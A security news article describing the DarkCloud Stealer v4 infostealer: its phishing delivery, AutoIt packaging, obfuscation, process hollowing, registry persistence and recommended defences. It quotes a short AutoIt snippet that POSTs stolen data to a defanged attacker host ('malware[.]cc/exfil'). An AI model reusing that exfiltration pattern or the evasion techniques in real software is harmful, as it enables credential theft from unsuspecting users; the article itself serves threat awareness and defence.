Known as DarkCloud Stealer v4, this variant has been active since March 2025. It has targeted financial institutions, healthcare providers, and e-commerce platforms across Asia and Europe.
Security researchers warn that the malware’s use of old tools like AutoIt, combined with advanced obfuscation, makes it difficult to detect with standard security software.
Stealth Through AutoIt and Obfuscation
Experts from Palo Alto Networks’ Unit 42 report that DarkCloud v4 compiles malicious scripts into standalone AutoIt executables. These mimic legitimate software processes, helping the malware bypass heuristic scans and sandbox analysis.
The malware spreads through phishing emails disguised as invoice alerts, malicious ad redirects, and fake software updates for popular tools such as Slack and Zoom.
Once installed, the stealer extracts browser cookies, saved passwords, autofill information, and two-factor authentication (2FA) tokens. The stolen data is then sent to attacker-controlled servers over encrypted HTTPS connections.
Researchers estimate that DarkCloud v4 has compromised over 120,000 accounts, with the stolen credentials sold on dark web marketplaces.
The malware’s modular architecture allows it to receive new payloads, making it adaptable to evolving security defenses.
Inside the Attack: AutoIt and Process Hollowing
DarkCloud v4’s main innovation lies in its use of AutoIt, a scripting language usually used for administrative tasks. The malware hides its payload in an AutoIt interpreter, which runs the code directly in system memory.
; Sample AutoIt code snippet used in data exfiltration #include $hSession = _WinHttpOpen() $hConnect = _WinHttpConnect($hSession, "malware[.]cc") $hRequest = _WinHttpSendRequest($hConnect, "POST", "/exfil", ..., $sData)
This code shows how the malware exfiltrates data using an HTTP POST request.
To avoid static detection, DarkCloud v4 uses Base64 and XOR encoding and adds junk instructions to confuse analysis tools. It also uses process hollowing—a technique where it injects malicious code into trusted processes like explorer.exe or svchost.exe.
In process hollowing, the malware pauses a legitimate process, replaces its memory content with its own code, and resumes the process. This method leaves few signs of compromise and is often seen only in memory forensic dumps.
To maintain persistence, DarkCloud v4 creates scheduled tasks and Registry entries under:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Defensive Measures and Recommendations
Organizations are urged to monitor for suspicious AutoIt activity, especially processes that initiate unexpected network connections.
Behavior-based endpoint detection should look for unusual process injections and rapid attempts to access credentials. Compiled AutoIt files (.a3x) or script-based processes launched by trusted apps should be treated as suspicious.
Palo Alto Networks recommends application allowlisting and network segmentation to limit the spread of such malware.
Most importantly, users should remain alert to phishing and social engineering tactics, which remain the primary delivery method for DarkCloud v4.
